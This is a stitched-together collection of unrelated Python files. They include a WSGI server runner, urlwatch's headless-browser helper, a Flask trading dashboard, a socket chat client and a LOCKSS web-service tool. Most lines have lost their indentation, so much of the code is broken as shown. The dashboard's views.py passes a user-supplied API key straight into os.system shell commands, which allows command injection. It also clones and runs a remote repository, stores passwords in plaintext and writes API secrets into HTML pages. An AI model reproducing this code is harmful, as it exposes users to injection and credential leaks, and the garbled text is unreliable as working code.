logger = logging.getLogger(__name__)
_http_server = None
_https_server = None
_snapclient = None
def run(app, root_prefix="", hostname="0.0.0.0", http_port=None,
https_port=None, https_cert_path=None, https_certkey_path=None):
root_prefix = root_prefix or ""
dispatcher = wsgi.PathInfoDispatcher({root_prefix: app})
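# mount the WSGI app under root_prefix (e.g. "" or "/api"); cheroot dispatches requests by path prefix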
global _http_server
global _https_server
http_thread = None
https_thread = None
if http_port:
_http_server = wsgi.Server(
(hostname, http_port), dispatcher)
http_thread = threading.Thread(target=_http_server.start)
if https_port:
_https_server = wsgi.Server(
(hostname, https_port), dispatcher)
_https_server.ssl_adapter = BuiltinSSLAdapter(
https_cert_path, https_certkey_path)
https_thread = threading.Thread(target=_https_server.start)
if http_thread is not None:
http_thread.start()
if https_thread is not None:
https_thread.start()
global _snapclient
snapclient_cmd = (
"C:\\Users\\repole\\Projects\\snapcast\\bin\\Release\\snapclient.exe "
"-h 192.168.1.98 "
"-p 1704").split(" ")
# keep a handle to the spawned snapclient process in the module-level global declared above
_snapclient = subprocess.Popen(snapclient_cmd, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
def run_wsgi_servers(app, user_data_path):
config_file = os.path.join(user_data_path, 'config.ini')
config_parser = configparser.RawConfigParser()
config_parser.read(config_file)
try:
http_port = config_parser.getint('api_server', 'http_port')
except (ValueError, TypeError):
http_port = None
try:
https_port = config_parser.getint('api_server', 'https_port')
except (ValueError, TypeError):
https_port = None
hostname = config_parser.get('api_server', 'hostname').strip("'").strip('"')
hostname = None if hostname == "None" else hostname
root_prefix = config_parser.get('api_server', 'root').strip('"').strip("'")
root_prefix = None if root_prefix == "None" else root_prefix
https_cert_path = os.path.join(user_data_path, 'keys', 'server.crt')
https_certkey_path = os.path.join(user_data_path, 'keys', 'server.crtkey')
run(app, root_prefix, hostname, http_port, https_port, https_cert_path,
https_certkey_path)
def stop_wsgi_servers():
global _http_server
global _https_server
if _http_server is not None:
_http_server.stop()
if _https_server is not None:
_https_server.stop()
def restart_wsgi_servers():
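# re-exec the current interpreter with the same arguments to restart the servers
# (argv[0] is quoted, presumably for Windows paths containing spaces)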
logger.debug("Entering restart_wsgi_servers()")
args = sys.argv
args[0] = '"' + args[0] + '"'
os.execl(sys.executable, sys.executable, * args)
|
browser.py
|
# -*- coding: utf-8 -*-
#
# This file is part of urlwatch (https://thp.io/2008/urlwatch/).
# Copyright (c) 2008-2020 Thomas Perl <m@thp.io>
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. The name of the author may not be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR
# IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
# OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
# IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
# NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
# THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import logging
import pyppeteer
import asyncio
import threading
from .cli import setup_logger
logger = logging.getLogger(__name__)
class BrowserLoop(object):
def __init__(self):
self._event_loop = asyncio.new_event_loop()
self._browser = self._event_loop.run_until_complete(self._launch_browser())
self._loop_thread = threading.Thread(target=self._event_loop.run_forever)
self._loop_thread.start()
@asyncio.coroutine
def _launch_browser(self):
browser = yield from pyppeteer.launch()
for p in (yield from browser.pages()):
yield from p.close()
return browser
@asyncio.coroutine
def _get_content(self, url, wait_until=None):
context = yield from self._browser.createIncognitoBrowserContext()
page = yield from context.newPage()
opts = {}
if wait_until is not None:
opts['waitUntil'] = wait_until
yield from page.goto(url, opts)
content = yield from page.content()
yield from context.close()
return content
def process(self, url, wait_until=None):
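# schedule the coroutine on the browser's event loop (running in _loop_thread) and block
# the calling thread until the page content is available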
coroutine = self._get_content(url, wait_until=wait_until)
return asyncio.run_coroutine_threadsafe(coroutine, self._event_loop).result()
def destroy(self):
self._event_loop.call_soon_threadsafe(self._event_loop.stop)
self._loop_thread.join()
self._loop_thread = None
self._event_loop.run_until_complete(self._browser.close())
self._browser = None
self._event_loop = None
class BrowserContext(object):
_BROWSER_LOOP = None
_BROWSER_LOCK = threading.Lock()
_BROWSER_REFCNT = 0
def __init__(self):
with BrowserContext._BROWSER_LOCK:
if BrowserContext._BROWSER_REFCNT == 0:
logger.info('Creating browser main loop')
BrowserContext._BROWSER_LOOP = BrowserLoop()
BrowserContext._BROWSER_REFCNT += 1
def process(self, url, wait_until=None):
return BrowserContext._BROWSER_LOOP.process(url, wait_until=wait_until)
def close(self):
with BrowserContext._BROWSER_LOCK:
BrowserContext._BROWSER_REFCNT -= 1
if BrowserContext._BROWSER_REFCNT == 0:
logger.info('Destroying browser main loop')
BrowserContext._BROWSER_LOOP.destroy()
BrowserContext._BROWSER_LOOP = None
def main():
import argparse
parser = argparse.ArgumentParser(description='Browser handler')
parser.add_argument('url', help='URL to retrieve')
parser.add_argument('-v', '--verbose', action='store_true', help='show debug output')
parser.add_argument('-w',
'--wait-until',
dest='wait_until',
choices=['load', 'domcontentloaded', 'networkidle0', 'networkidle2'],
help='When to consider a pageload finished')
args = parser.parse_args()
setup_logger(args.verbose)
ctx = BrowserContext()
try:
print(ctx.process(args.url, wait_until=args.wait_until))
finally:
ctx.close()
if __name__ == '__main__':
main()
|
views.py
|
# -*- encoding: utf-8 -*-
"""
License: MIT
Copyright (c) 2019 - present AppSeed.us
"""
# Python modules
import fnmatch
import os, logging
# Flask modules
import threading
import requests
from flask import render_template, request, url_for, redirect, send_from_directory, session, Response, flash
from flask_login import login_user, logout_user, current_user, login_required
from werkzeug.exceptions import HTTPException, NotFound, abort
import alpaca_trade_api as tradeapi
import datetime
import random
from datetime import date
from dateutil.relativedelta import relativedelta
# App modules
import pandas as pd
from yahoo_fin.stock_info import get_data
from yahoo_fin.stock_info import get_day_gainers
import sys
import trace
from app import app, lm, db, bc
from app.models import User
from app.forms import LoginForm, RegisterForm
from StratusDashboard.app.forms import APIForm
userlist = {}
def findtopstock():
url = 'https://finance.yahoo.com/screener/predefined/most_actives'
read = pd.read_html(url)[0]
symbols = read['Symbol'][0]
change = read['% Change'][0]
return symbols, change
def findgainer():
url = 'https://finance.yahoo.com/gainers'
read = pd.read_html(url)[0]
symbols = read['Symbol']
change = read['% Change']
price = read['Price (Intraday)']
return symbols, change, price
def findReplace(directory, find, replace, filePattern):
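# in-place find/replace across every file under directory matching filePattern
# (used by start() below to inject the API credentials into the cloned repo's *.csv files)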
for path, dirs, files in os.walk(os.path.abspath(directory)):
for filename in fnmatch.filter(files, filePattern):
filepath = os.path.join(path, filename)
with open(filepath) as f:
s = f.read()
s = s.replace(find, replace)
with open(filepath, "w") as f:
f.write(s)
f.close()
def human_format(num):
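# e.g. human_format(1234567) -> '1.23M'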
magnitude = 0
while abs(num) >= 1000:
magnitude += 1
num /= 1000.0
# add more suffixes if you need them
return '%.2f%s' % (num, ['', 'K', 'M', 'G', 'T', 'P'][magnitude])
lfcount = 0
def replace(apikey, apisecret, apiurl):
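# builds the dashboard page by string-replacing placeholder tokens (REPLACE*, ACC*, GAIN*, ITEM*, ...)
# in the index template with live Alpaca account data and Yahoo Finance quotes, then writes the
# result to newpages/index.html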
api = tradeapi.REST(apikey, apisecret, apiurl)
one_month = date.today() + relativedelta(hours=-5)
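# note: despite the name, this is only 5 hours before today's date (i.e. yesterday evening);
# it is used as the start date for the top-stock history below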
indexreturn = ''
resstock = ''
daygraph = []
jsquery = ''
ccount = 0
numblist = []
topstocklist = []
openpositions = []
domain = 'StratusDashboard.githubemploy.repl.co'
account = api.get_account()
gainer, gainerchange, gainerprice = findgainer()
lastMonth = (datetime.date.today().replace(day=1) - datetime.timedelta(days=1)).strftime("%Y-%m-%d")
lastdate = api.get_portfolio_history(date_start=lastMonth, date_end=datetime.date.today(), period=None,
timeframe='15Min')
today_parts = str(datetime.date.today()).split('-')
yesterday_str = today_parts[0] + '-' + today_parts[1] + '-' + str(int(today_parts[2]) - 1)
dayrundict = api.get_portfolio_history(date_start=yesterday_str, date_end=datetime.date.today(),
period=None, timeframe='15Min').df.to_dict()['equity'].values()
balance_change = str(round(float(account.equity) - float(account.last_equity), 2))
print(balance_change)
topstock, stockchange = findtopstock()
topstockdata = get_data(topstock, start_date = str(one_month), end_date = datetime.date.today(), index_as_date = True, interval = "1d").to_dict()['open'].values()
for item in topstockdata:
topstocklist.append(item)
for loop in range(0, 6, 1):
numblist.append(str(random.randint(0,18)))
with open('/Users/mohit/PycharmProjects/SerpentAI/StratusDashboard/app/templates/pages/index.html', 'r') as reader:
for line in reader:
indexreturn = indexreturn + line
with open('/Users/mohit/PycharmProjects/SerpentAI/StratusDashboard/app/static/assets/js/argon.js', 'r') as reader:
for line in reader:
jsquery = jsquery + line
with open('/Users/mohit/PycharmProjects/SerpentAI/StratusDashboard/app/static/assets/js/argon.js', 'w+') as reader:
jsquery = jsquery.replace('[0, 20, 10, 30, 15, 40, 20, 60, 60]', str(numblist))
reader.write(jsquery)
with open('/Users/mohit/PycharmProjects/SerpentAI/StratusDashboard/app/templates/newpages/index.html', 'w+') as writer:
if float(account.buying_power) <= float(list(lastdate.df.to_dict()['equity'].values())[0]):
resacc = "fas fa-arrow-down"
accolor = 'text-danger mr-2'
if float(account.buying_power) > float(list(lastdate.df.to_dict()['equity'].values())[0]):
resacc = "fa fa-arrow-up"
accolor = 'text-success mr-2'
if str(''.join([i for i in stockchange if not i.isdigit()])).strip().replace('.', '').replace('%', '') == '-':
resstock = "fas fa-arrow-down"
stockcolor = 'text-danger mr-2'
if str(''.join([i for i in stockchange if not i.isdigit()])).strip().replace('.', '').replace('%', '') == '+':
resstock = "fa fa-arrow-up"
stockcolor = 'text-success mr-2'
stockchange = str(stockchange).replace('+', '').replace('-', '')
portfolio = api.list_positions()
# Record the symbol of each open position.
for position in portfolio:
openpositions.append(str(position.symbol))
sendvar = (str(indexreturn)
.replace('REPLACEACCOUNTVALUE', str(account.buying_power) + '$')
.replace('ACCARROW', resacc)
.replace('ACCPERCENT', str(human_format(abs(float(account.buying_power) - float(list(lastdate.df.to_dict()['equity'].values())[0])))))
.replace('PROFITLOSS', str(balance_change))
.replace('REPLACESTOCK', topstock)
.replace('REPLACECHANGE', str(stockchange))
.replace('RESSTOCK', resstock)
.replace('TEXTSTOCK', stockcolor)
.replace('ACCOLOR', accolor)
.replace('OPENPOSITIONS', str(len(openpositions))+' Stock(s)'))
sendvar = sendvar.replace('REPLACEDAILYDATA', str(topstocklist))
for item in api.list_orders(status='closed', limit=5):
ccount = ccount + 1
sendvar = sendvar.replace('ITEM'+str(ccount), str(item.symbol))
sendvar = sendvar.replace('SHARES'+str(ccount), str(item.qty))
sendvar = sendvar.replace('SIDE'+str(ccount), str(item.side))
if str(item.side) == 'buy':
sendvar = sendvar.replace('CLASS'+str(ccount), 'fas fa-arrow-up text-success mr-3')
else:
sendvar = sendvar.replace('CLASS'+str(ccount), 'fas fa-arrow-down text-warning mr-3')
sendvar = sendvar.replace('TYPE'+str(ccount), str(item.time_in_force))
#print(item.symbol, item.qty, item.side, item.time_in_force)
for loop in range(0, 6, 1):
#print(str(str(gainerchange[loop]).replace('%', '').replace('+', '').replace('-', '').strip()))
sendvar = sendvar.replace('GAINPRICE'+str(loop), str(gainerprice[loop])+'$')
sendvar = sendvar.replace('GAINSTOCK'+str(loop), gainer[loop])
sendvar = sendvar.replace('GAINPERCENT'+str(loop), str(str(gainerchange[loop]).replace('%', '').replace('+', '').replace('-', '').strip()))
sendvar = sendvar.replace('DOMAINPORT', domain).replace('APIKEY', apikey).replace('APISECRET', apisecret).replace('APIURL', apiurl)
writer.write(sendvar)
session = {}
@lm.user_loader
def load_user(user_id):
return User.query.get(int(user_id))
@app.route('/startform.html', methods=['GET', 'POST'])
def startform():
form = APIForm(request.form)
if form.validate() or request.method == "POST":
session['apikey'] = str(form.pubapi.data)
session['secretkey'] = str(form.secapi.data)
session['urlkey'] = str(form.urlapi.data)
print(form.pubapi.data, form.secapi.data, form.urlapi.data)
return redirect('/start.html')
return render_template('layouts/api-default.html', content=render_template('pages/startform.html', form=form))
#return render_template('pages/startform.html', form=form)
@app.route('/start.html')
def start():
try:
apikey = session['apikey']
except:
return render_template('layouts/api-default.html', content=render_template('pages/404.html'))
privatekey = session['secretkey']
apiurl = session['urlkey']
usedir = str('user' + apikey)
isDirectory = os.path.isdir(usedir)
runyn = True
def runuser():
os.system('cd ' + usedir + ' && python RunFile.py')
if isDirectory == True:
userlist[apikey] = threading.Thread(target=runuser)
userlist[apikey].start()
elif isDirectory == False:
replace(str(apikey), str(privatekey), str(apiurl))
os.system('git clone https://github.com/GitHubEmploy/SuperSimpleAITrading.git '+usedir)
findReplace(str(str('user') + str(apikey)), "publicapikey", apikey, "*.csv")
findReplace(str(str('user') + str(apikey)), "secretapikey", privatekey, "*.csv")
findReplace(str(str('user') + str(apikey)), "usageurl", apiurl, "*.csv")
userlist[apikey] = threading.Thread(target=runuser)
userlist[apikey].start()
return render_template('layouts/api-default.html', content=render_template('pages/startedproc.html'))
# Logout user
@app.route('/logout.html')
def logout():
logout_user()
form = LoginForm(request.form)
return redirect("/login.html")
# Register a new user
@app.route('/register.html', methods=['GET', 'POST'])
def register():
# declare the Registration Form
form = RegisterForm(request.form)
msg = None
if request.method == 'GET':
return render_template('layouts/auth-default.html',
content=render_template('pages/register.html', form=form, msg=msg))
# check if both http method is POST and form is valid on submit
if form.validate_on_submit():
# assign form data to variables
username = request.form.get('username', '', type=str)
password = request.form.get('password', '', type=str)
email = request.form.get('email', '', type=str)
# filter User out of database through username
user = User.query.filter_by(user=username).first()
# filter User out of database through username
user_by_email = User.query.filter_by(email=email).first()
if user or user_by_email:
msg = 'Error: User exists!'
else:
pw_hash = password # bc.generate_password_hash(password)
user = User(username, email, pw_hash)
user.save()
msg = 'User created, please <a href="' + url_for('login') + '">login</a>'
else:
msg = 'Input error'
return render_template('layouts/auth-default.html',
content=render_template('pages/register.html', form=form, msg=msg))
# Authenticate user
@app.route('/login.html', methods=['GET', 'POST'])
def login():
# Declare the login form
form = LoginForm(request.form)
# Flask message injected into the page, in case of any errors
msg = None
# check if both http method is POST and form is valid on submit
if form.validate_on_submit():
# assign form data to variables
username = request.form.get('username', '', type=str)
password = request.form.get('password', '', type=str)
# filter User out of database through username
user = User.query.filter_by(user=username).first()
if user:
# if bc.check_password_hash(user.password, password):
if user.password == password:
login_user(user)
return redirect('/')
else:
msg = "Wrong password. Please try again."
else:
msg = "Unkown user"
return render_template('layouts/auth-default.html',
content=render_template('pages/login.html', form=form, msg=msg))
@app.route('/status.html', methods=['GET', 'POST'])
def statusapi():
apikey = session['apikey']
    try:
        if userlist[apikey].is_alive():
            return render_template('layouts/api-default.html', content=render_template('pages/apialive.html'))
        return render_template('layouts/api-default.html', content=render_template('pages/apinotalive.html'))
    except:
        return render_template('layouts/api-default.html', content=render_template('pages/404.html'))
@app.route('/stop.html', methods=['GET', 'POST'])
def stopapi():
apikey = session['apikey']
runyn = False
return render_template('layouts/api-default.html', content=render_template('pages/stopapi.html'))
#return 'Stopping Process Gracefully, this may take up to 10 minutes. Please be patient.'
@app.route('/', methods=['GET', 'POST'])
def default():
if not current_user.is_authenticated:
return redirect(url_for('login'))
form = APIForm(request.form)
if form.validate() or request.method == "POST":
try:
session['apikey'] = str(form.pubapi.data)
session['secretkey'] = str(form.secapi.data)
session['urlkey'] = str(form.urlapi.data)
replace(str(form.pubapi.data), str(form.secapi.data), str(form.urlapi.data))
except:
return render_template('layouts/api-default.html', content=render_template('pages/invalidapi.html', form=form, msg='Invalid API Keys/Combination. Visit https://alpaca.markets to get your API Keys!'))
#print(form.pubapi.data, form.secapi.data, form.urlapi.data)
return render_template('layouts/default.html', content=render_template('newpages/index.html'))
return render_template('layouts/api-default.html', content=render_template('pages/startform.html', form=form))
# print(str(indexreturn).replace('REPLACESERVERSTATUS', str(account.buying_power)))
@app.route('/<path>')
def index(path):
return render_template('layouts/auth-default.html',
content=render_template( 'pages/404.html' ) )
# Return sitemap
@app.route('/sitemap.xml')
def sitemap():
return send_from_directory(os.path.join(app.root_path, 'static'), 'sitemap.xml')
|
run_client.py
|
import socket
import sys
from time import sleep
from threading import Thread
import os
kill = False
s = socket.socket()
print("Connected to IP: " + "Server" + ":" + "9999")
print("Wrap commands in %/%.")
global hist
hist = []
sender_h = []
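# hist and sender_h are parallel lists: hist holds the message texts and sender_h the
# matching sender labels ("You" or the server address). Typing %cls% clears the local
# history, and a %quit% message from the server tells the client to shut down.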
def refresh():
prev_sender = ""
os.system('cls' if os.name == 'nt' else 'clear')
print("Connected to IP: " + "Server" + ":" + "9999")
print("_______________________________________________")
for text, i in zip(hist, range(len(hist))):
if(prev_sender != sender_h[i]):
print()
print(sender_h[i] + ": ")
print(" " + text)
else:
print(" " + text)
prev_sender = sender_h[i]
def send_txt():
    global hist, sender_h
    while not kill:
inp = input()
try:
s.send(str.encode(inp))
hist.append(inp)
sender_h.append("You")
refresh()
if(inp == "%cls%"):
hist = []
sender_h = []
refresh()
except:
if(kill):
sys.exit()
sleep(1)
s.send(str.encode(inp))
hist.append(inp)
sender_h.append("You")
refresh()
if(inp == "%cls%"):
hist.clear()
sender_h.clear()
refresh()
s.connect(("192.168.0.23", 9999))
sn = Thread(target=send_txt)
sn.start()
while True:
data = s.recv(1024)
if(len(data) > 0):
        m = data.decode("utf-8")
if(m == "%quit%"):
print("Server has gone offline. Enter enter to exit.")
kill = True
s.close()
sys.exit()
break
elif(m == "%cls%"):
pass
else:
hist.append(m)
sender_h.append("192.168.0.23")
refresh()
|
contentconfigurationservice.py
|
#!/usr/bin/env python2
'''A library and a command line tool to interact with the LOCKSS daemon's
content configuration service via its Web Services API.'''
__copyright__ = '''\
Copyright (c) 2000-2016, Board of Trustees of Leland Stanford Jr. University
All rights reserved.'''
__license__ = '''\
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation and/or
other materials provided with the distribution.
3. Neither the name of the copyright holder nor the names of its contributors
may be used to endorse or promote products derived from this software without
specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR
ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.'''
__version__ = '0.2.2'
import getpass
import itertools
from multiprocessing import Pool as ProcessPool
from multiprocessing.dummy import Pool as ThreadPool
from optparse import OptionGroup, OptionParser
import os.path
import sys
from threading import Lock, Thread
import ContentConfigurationServiceImplService_client
from wsutil import zsiauth
#
# Library
#
def add_au_by_id(host, auth, auid):
'''
Performs an addAuById operation (which adds a single AU on a single host, by
AUID), and returns a record with these fields:
- Id (string): the AUID
- IsSuccess (boolean): a success flag
- Message (string): an error message
- Name (string): the AU name
Parameters:
- host (string): a host:port pair
- auth (ZSI authentication object): an authentication object
- auid (string): an AUID
'''
req = ContentConfigurationServiceImplService_client.addAuById()
req.AuId = auid
return _ws_port(host, auth).addAuById(req).Return
def add_aus_by_id_list(host, auth, auids):
'''
Performs an addAusByIdList operation (which adds all given AUs on a single
host, by AUID), and returns a list of records with these fields:
- Id (string): the AUID
- IsSuccess (boolean): a success flag
- Message (string): an error message
- Name (string): the AU name
Parameters:
- host (string): a host:port pair
- auth (ZSI authentication object): an authentication object
- auids (list of strings): a list of AUIDs
'''
req = ContentConfigurationServiceImplService_client.addAusByIdList()
req.AuIds = auids
return _ws_port(host, auth).addAusByIdList(req).Return
def deactivate_au_by_id(host, auth, auid):
'''
Performs a deactivateAuById operation (which deactivates a single AU on a
single host, by AUID), and returns a record with these fields:
- Id (string): the AUID
- IsSuccess (boolean): a success flag
- Message (string): an error message
- Name (string): the AU name
Parameters:
- host (string): a host:port pair
- auth (ZSI authentication object): an authentication object
- auid (string): an AUID
'''
req = ContentConfigurationServiceImplService_client.deactivateAuById()
req.AuId = auid
return _ws_port(host, auth).deactivateAuById(req).Return
def deactivate_aus_by_id_list(host, auth, auids):
'''
Performs a deactivateAusByIdList operation (which deactivates all given AUs on
a single host, by AUID), and returns a list of records with these fields:
- Id (string): the AUID
- IsSuccess (boolean): a success flag
- Message (string): an error message
- Name (string): the AU name
Parameters:
- host (string): a host:port pair
- auth (ZSI authentication object): an authentication object
- auids (list of strings): a list of AUIDs
'''
req = ContentConfigurationServiceImplService_client.deactivateAusByIdList()
req.AuIds = auids
return _ws_port(host, auth).deactivateAusByIdList(req).Return
def delete_au_by_id(host, auth, auid):
'''
Performs a deleteAuById operation (which deletes a single AU on a single host,
by AUID), and returns a record with these fields:
- Id (string): the AUID
- IsSuccess (boolean): a success flag
- Message (string): an error message
- Name (string): the AU name
Parameters:
- host (string): a host:port pair
- auth (ZSI authentication object): an authentication object
- auid (string): an AUID
'''
req = ContentConfigurationServiceImplService_client.deleteAuById()
req.AuId = auid
return _ws_port(host, auth).deleteAuById(req).Return
def delete_aus_by_id_list(host, auth, auids):
'''
Performs a deleteAusByIdList operation (which deletes all given AUs on a
single host, by AUID), and returns a list of records with these fields:
- Id (string): the AUID
- IsSuccess (boolean): a success flag
- Message (string): an error message
- Name (string): the AU name
Parameters:
- host (string): a host:port pair
- auth (ZSI authentication object): an authentication object
- auids (list of strings): a list of AUIDs
'''
req = ContentConfigurationServiceImplService_client.deleteAusByIdList()
req.AuIds = auids
return _ws_port(host, auth).deleteAusByIdList(req).Return
def reactivate_au_by_id(host, auth, auid):
'''
Performs a reactivateAuById operation (which reactivates a single AU on a
single host, by AUID), and returns a record with these fields:
- Id (string): the AUID
- IsSuccess (boolean): a success flag
- Message (string): an error message
- Name (string): the AU name
Parameters:
- host (string): a host:port pair
- auth (ZSI authentication object): an authentication object
- auid (string): an AUID
'''
req = ContentConfigurationServiceImplService_client.reactivateAuById()
req.AuId = auid
return _ws_port(host, auth).reactivateAuById(req).Return
def reactivate_aus_by_id_list(host, auth, auids):
'''
Performs a reactivateAusByIdList operation (which reactivates all given AUs on
a single host, by AUID), and returns a list of records with these fields:
- Id (string): the AUID
- IsSuccess (boolean): a success flag
- Message (string): an error message
- Name (string): the AU name
Parameters:
- host (string): a host:port pair
- auth (ZSI authentication object): an authentication object
- auids (list of strings): a list of AUIDs
'''
req = ContentConfigurationServiceImplService_client.reactivateAusByIdList()
req.AuIds = auids
return _ws_port(host, auth).reactivateAusByIdList(req).Return
def _ws_port(host, auth, tracefile=None):
'''
Internal convenience method used to set up a Web Services Port.
Parameters:
- host (string): a host:port pair
- auth (ZSI authentication object): an authentication object
- tracefile (file object): an optional trace file (default None for no trace)
'''
url = 'http://%s/ws/ContentConfigurationService' % (host,)
locator = ContentConfigurationServiceImplService_client.ContentConfigurationServiceImplServiceLocator()
if tracefile is None: return locator.getContentConfigurationServiceImplPort(url=url, auth=auth)
else: return locator.getContentConfigurationServiceImplPort(url=url, auth=auth, tracefile=tracefile)
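# A minimal usage sketch of the library functions above (hypothetical host,
# credentials and AUID; adjust to your own daemon):
#
#   from wsutil import zsiauth
#   auth = zsiauth('someuser', 'somepassword')
#   result = add_au_by_id('daemon.example.edu:8081', auth, 'some|plugin|auid')
#   if not result.IsSuccess:
#       print result.Message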
#
# Command line tool
#
__tutorial__ = '''\
INTRODUCTION
This tool can be used to add, delete, activate and deactivate AUs on one or more
LOCKSS hosts. Invoking the tool consists of four parts:
- Specify the target hosts. Each occurrence of --host=HOST adds the host:port
pair HOST to the list of target hosts, and each occurrence of --hosts=HFILE adds
the host:port pairs in the file HFILE to the list of target hosts. HFILE can
contain comments, which begin at the character '#' and extend to the end of the
line. At least one target host is required. You will be prompted for a username
and password unless you pass them via --username and --password.
- Specify the target AUIDs. Likewise, each occurrence of --auid=AUID adds the
given AUID to the list of target AUIDs, and each occurrence of --auids=AFILE
adds the AUIDs in the file AFILE to the list of target AUIDs. AFILE can also
contain comments. At least one target AUID is required.
- Specify the desired operation. This is done by using exactly one of --add-aus,
--delete-aus, --deactivate-aus or --reactivate-aus.
- Optionally specify output options (see below).
OUTPUT
This tool can produce two styles of output: text output with --text-output and
tabular output with --table-output. By default, --text-output is in effect,
unless --table-output is explicitly specified.
When --text-output is in effect, unsuccessful operations are output one per line
on the console, host by host. You can additionally specify --verbose, in which
case all successful operations are also displayed host by host. The --verbose
option is only valid if --text-output is in effect.
When --table-output is in effect, a tab-separated table of unsuccessful
operations is output to the console, one row per target AU with at least one
unsuccessful operation and one column per target host.
In either output mode, the order of AUs listed (for each host in text mode, for
the whole table in tabular mode) is dictated by --sort-by-auid (AUID) or
--sort-by-name (AU name). By default, --sort-by-name is in effect, unless
--sort-by-auid is explicitly specified. Likewise, the way AUs are displayed is
governed by --list-by-auid (show the AUID), --list-by-name (show the AU name),
or --list-by-both (show the name and the AUID separated by a tab). By default,
--list-by-both is in effect unless another option in this category is specified.
The listing by name is currently just a string comparison, not a clever library
sort like in the LOCKSS daemon.
EXAMPLES
$ scripts/ws/contentconfigurationservice --host=foo.university.edu:8081 --auid=aaaaa1 --add-aus
Adds the AUID aaaaa1 to foo.university.edu:8081. Produces text output (the
default) only if the operation does not succeed.
$ scripts/ws/contentconfigurationservice --hosts=mydaemons.hosts --auids=myfile.auids --add-aus
Adds the AUIDs contained in myfile.auids to all the hosts contained in
mydaemons.hosts. Produces text output (the default) only if some operations do
not succeed. AUs are sorted by AU name (the default) and displayed as a
name-AUID pair (the default).
$ scripts/ws/contentconfigurationservice --hosts=mydaemons.hosts --auids=myfile.auids --add-aus --verbose
Adds the AUIDs contained in myfile.auids to all the hosts contained in
mydaemons.hosts. Produces text output (the default), both of successful
operations and unsuccessful operations. AUs are sorted by AU name (the default)
and displayed as a name-AUID pair (the default).
$ scripts/ws/contentconfigurationservice --hosts=mydaemons.hosts --auids=myfile.auids --add-aus --list-by-name
Adds the AUIDs contained in myfile.auids to all the hosts contained in
mydaemons.hosts. Produces text output (the default) only if some operations do
not succeed. AUs are sorted by AU name (the default) and displayed by AU name.
$ scripts/ws/contentconfigurationservice --hosts=mydaemons.hosts --auids=myfile.auids --add-aus --sort-by-auid --list-by-auid
Adds the AUIDs contained in myfile.auids to all the hosts contained in
mydaemons.hosts. Produces text output (the default) only if some operations do
not succeed. AUs are sorted by AUID and displayed by AUID.
$ scripts/ws/contentconfigurationservice --hosts=mydaemons.hosts --auids=myfile.auids --add-aus --table-output
Adds the AUIDs contained in myfile.auids to all the hosts contained in
mydaemons.hosts. If any operation does not succeed, prints a table of
unsuccessful operations where each row is an AU and each column is a host. The
rows are sorted by AU name (the default) and displayed as a name-AUID pair (the
default).'''
class _ContentConfigurationServiceOptions(object):
'''An internal object to encapsulate options suitable for this tool.'''
@staticmethod
def make_parser():
'''Static method to make a command line parser suitable for this tool.'''
usage = '%prog {--host=HOST|--hosts=HFILE}... {--auid=AUID|--auids=AFILE}... {--add-aus|--deactivate-aus|--delete-aus|--reactivate-aus} [OPTIONS]'
parser = OptionParser(version=__version__, description=__doc__, usage=usage)
# Top-level options
parser.add_option('--copyright', action='store_true', help='display copyright and exit')
parser.add_option('--license', action='store_true', help='display software license and exit')
parser.add_option('--tutorial', action='store_true', help='display tutorial and exit')
# Hosts
group = OptionGroup(parser, 'Target hosts')
group.add_option('--host', action='append', default=list(), help='add host:port pair to list of target hosts')
group.add_option('--hosts', action='append', default=list(), metavar='HFILE', help='add host:port pairs in HFILE to list of target hosts')
group.add_option('--password', metavar='PASS', help='UI password (default: interactive prompt)')
group.add_option('--username', metavar='USER', help='UI username (default: interactive prompt)')
parser.add_option_group(group)
# AUIDs
group = OptionGroup(parser, 'Target AUIDs')
group.add_option('--auid', action='append', default=list(), help='add AUID to list of target AUIDs')
group.add_option('--auids', action='append', default=list(), metavar='AFILE', help='add AUIDs in AFILE to list of target AUIDs')
parser.add_option_group(group)
# Content configuration operations
group = OptionGroup(parser, 'Content configuration operations')
group.add_option('--add-aus', action='store_true', help='add target AUs to target hosts')
